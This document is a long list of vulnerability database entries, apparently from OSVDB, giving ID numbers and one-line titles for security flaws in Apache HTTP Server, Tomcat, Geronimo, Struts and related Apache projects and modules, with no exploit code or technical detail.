| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
| [58725] Apache Tapestry Basic String ACL Bypass Weakness
| [58724] Apache Roller Logout Functionality Failure Session Persistence
| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
| [58687] Apache Axis Invalid wsdl Request XSS
| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
| [58685] Apache Velocity Template Designer Privileged Code Execution
| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
| [58667] Apache Roller Database Cleartext Passwords Disclosure
| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
| [56984] Apache Xerces2 Java Malformed XML Input DoS
| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
| [55056] Apache Tomcat Cross-application TLD File Manipulation
| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
| [54589] Apache Jserv Nonexistent JSP Request XSS
| [54122] Apache Struts s:a / s:url Tag href Element XSS
| [54093] Apache ActiveMQ Web Console JMS Message XSS
| [53932] Apache Geronimo Multiple Admin Function CSRF
| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
| [53930] Apache Geronimo /console/portal/ URI XSS
| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
| [53380] Apache Struts Unspecified XSS
| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
| [51151] Apache Roller Search Function q Parameter XSS
| [50482] PHP with Apache php_value Order Unspecified Issue
| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
| [47096] Oracle Weblogic Apache Connector POST Request Overflow
| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
| [43452] Apache Tomcat HTTP Request Smuggling
| [43309] Apache Geronimo LoginModule Login Method Bypass
| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
| [42091] Apache Maven Site Plugin Installation Permission Weakness
| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
| [40262] Apache HTTP Server mod_status refresh XSS
| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
| [36080] Apache Tomcat JSP Examples Crafted URI XSS
| [36079] Apache Tomcat Manager Uploaded Filename XSS
| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
| [34881] Apache Tomcat Malformed Accept-Language Header XSS
| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
| [32724] Apache mod_python _filter_read Freed Memory Disclosure
| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
| [24365] Apache Struts Multiple Function Error Message XSS
| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
| [22459] Apache Geronimo Error Page XSS
| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
| [21021] Apache Struts Error Message XSS
| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
| [20439] Apache Tomcat Directory Listing Saturation DoS
| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
| [20285] Apache HTTP Server Log File Control Character Injection
| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
| [19821] Apache Tomcat Malformed Post Request Information Disclosure
| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
| [18233] Apache HTTP Server htdigest user Variable Overfow
| [17738] Apache HTTP Server HTTP Request Smuggling
| [16586] Apache HTTP Server Win32 GET Overflow DoS
| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
| [13304] Apache Tomcat realPath.jsp Path Disclosure
| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
| [12848] Apache HTTP Server htdigest realm Variable Overflow
| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
| [12557] Apache HTTP Server prefork MPM accept Error DoS
| [12233] Apache Tomcat MS-DOS Device Name Request DoS
| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
| [12231] Apache Tomcat web.xml Arbitrary File Access
| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
| [12178] Apache Jakarta Lucene results.jsp XSS
| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
| [10471] Apache Xerces-C++ XML Parser DoS
| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
| [10068] Apache HTTP Server htpasswd Local Overflow
| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
| [9717] Apache HTTP Server mod_cookies Cookie Overflow
| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
| [9714] Apache Authentication Module Threaded MPM DoS
| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
| [9208] Apache Tomcat .jsp Encoded Newline XSS
| [9204] Apache Tomcat ROOT Application XSS
| [9203] Apache Tomcat examples Application XSS
| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
| [7611] Apache HTTP Server mod_alias Local Overflow
| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
| [6882] Apache mod_python Malformed Query String Variant DoS
| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
| [5526] Apache Tomcat Long .JSP URI Path Disclosure
| [5278] Apache Tomcat web.xml Restriction Bypass
| [5051] Apache Tomcat Null Character DoS
| [4973] Apache Tomcat servlet Mapping XSS
| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
| [4568] mod_survey For Apache ENV Tags SQL Injection
| [4553] Apache HTTP Server ApacheBench Overflow DoS
| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
| [4383] Apache HTTP Server Socket Race Condition DoS
| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
9871| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
9872| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
9873| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
9874| [4231] Apache Cocoon Error Page Server Path Disclosure
9875| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
9876| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
9877| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
9878| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
9879| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
9880| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
